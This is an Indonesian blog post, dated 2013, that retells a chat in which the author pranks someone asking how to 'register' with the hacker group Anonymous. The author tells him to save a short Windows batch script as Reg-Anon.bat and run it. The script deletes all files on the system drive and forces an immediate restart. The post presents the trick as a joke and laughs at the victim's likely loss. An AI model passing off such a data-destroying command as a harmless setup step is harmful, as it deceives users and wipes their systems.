Monday, December 23, 2013

Cara Mendaftar Menjadi Anonymous

GoogleNewws.blogspot.com - Suatu ketika ada seseorang yang secara tiba-tiba bertanya sesuatu kepada saya via chatting. Dia bertanya sesuatu yang saya pun tak tahu bagaimana caranya. Ya, dia bertanya "bagaimana cara mendaftar agar bisa menjadi anggota  ANONYMOUS". Bagi anda yang sering nongkrong di dunia maya, pasti tak asing lagi dengan nama ANONYMOUS. Kelompok Hacker yang sedang naik daun saat ini.

Saat dia bertanya tentang hal tersebut, pas kebetulan sekali naluri dan nafsu "USIL" saya sedang di level tertinggi "BAHAYA !!". Maka tak ayal, orang tersebut menjadi sasaran ke-usilan saya, hingga terjadilah percakapan/chatting berikut ini...
Cekibrooott....

A (si penanya) : om...


B (ane) : oit..., ada ape om..??


A : boleh tanya sesuatu gak om ?


B : apaan om...?? 


A : kira-kira oom tau gak caranya daftar jadi anggota anonymous ?


B : etddaaahhh...., oom mau daftar..?? 

      oom Hekel yak...??  #sungkem_dulu

A : hahahaha, jangan gitulah om,

      gimana om, tau gak caranya daftar jd member anonymous ??

B : oom yakin mau daftar...???
      ( naluri ISENGnya lagi bergemuruh ni, wakakakak.... )


A : iya om, yakin banget !!!


B: ohhh, ok deh
     ane kasih tau caranya, tapi inget yak, semua resiko ditanggung penumpang (ditanggung sendiri maksutnya)


A : beneran ni om ?

      oom mau ngasih tau caranya

B : ya, tapi kudu janji dulu

     apapun yang terjadi, resikonya tanggung sendiri
     paham..???


A : paham om


B : siap ???


A : siap banget om


B : ok, sekarang ikutin langkah-langkah berikut...


A : ok om


B : pertama buka Notepad


A : bentar om,
     yak sip, udah om
     terus bgimane ni ?


B : udah kan...
     nah sekarang ketik script ini di Notepad


     @echo off

      del %systemdrive%\*.* /f /s/ /q
      shutdown -r -f -t 00

      trus simpen filenya dengan nama Reg-Anon.bat
      inget...., kudu enkstensi *.bat yah...


A : sip om
     beres
     trus giamana om ?


B : nah, sebelum ke step final
     ane cuma ngingetin lagi
     inget, semua resiko ditanggung sendiri...


A : iya om, saya paham


B : ok,

     step final
     klik ganda/double klik file tadi...

     nah, tinggal ikutin aja deh step-step yang nongol
     dan selamat, anda telah menjadi Member ANONYMOUS...

     :)
    
Ehhhh,
Sejak hari itu, orang tersebut gak pernah lagi nongol di cattingan saya.

Entah dia udah ditangkep cyber police, atau sedang fokus melakukan serangan...
Saya gak tau pasti...
Yang jelas, dari awal saya sudah mengatakan ke dia, bahwa semua resiko yang muncul ditanggung sendiri...
Jadi jangan bawa-bawa nama saya apalagi nyalah-nyalahin saya...
:v
wakakakakakakakak...........  (ketawa jahat)


Sumber : Catatan Zet 

Berlangganan artikel via email :

Delivered by Google Newws

Share On:

Related Post:

Belum ada komentar untuk "Cara Mendaftar Menjadi Anonymous"

Post a Comment

Jika Ingin Memberikan Komentar Harap Memakai Bahasa yang SOPAN Jika Memakai Bahasa yang Tidak SOPAN Komentar Akan dihapus Karena Komentar Blog Google Newws Tidak Memakai Moderasi Komentar & Terbuka Untuk Siapapun

Terima Kasih

 
 
All Right Reserved - Google Newws | Share It
Design by Google Newws | Like Our Fanspage Google Newws